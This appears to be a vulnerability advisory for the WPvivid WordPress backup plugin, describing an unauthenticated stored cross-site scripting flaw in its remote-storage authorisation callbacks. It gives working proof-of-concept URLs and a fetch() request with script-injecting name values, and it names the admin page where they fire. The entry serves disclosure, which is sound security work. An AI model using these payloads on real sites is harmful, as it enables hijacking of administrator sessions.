The plugin does not have authorisation when adding remote storages, and does not sanitise as well as escape a parameter from such unauthenticated requests before outputting it in admin page, leading to a Stored Cross-Site Scripting issue
As unauthenticated v < 0.9.67 - https://example.com/?action=wpvivid_one_drive_finish_auth&name=%3Cimg%20src%20onerror=alert(/XSS/)%3E v < 0.9.69: - https://example.com/?action=wpvivid_google_drive_finish_auth&name=%22%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)%20x - fetch('https://example.com/?action=wpvivid_one_drive_finish_auth&name=%3Cimg%20src%20onerror=alert(/XSS/)%3E', { method: 'POST', "headers": { "content-type": "application/x-www-form-urlencoded" }, body: 'access_token=1&refresh_token=1&expires_in=1'}); The XSS will be triggered when https://example.com/wp-admin/admin.php?page=WPvivid is accessed
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-31 (about 1 years ago)
2022-01-31 (about 1 years ago)
2022-04-12 (about 9 months ago)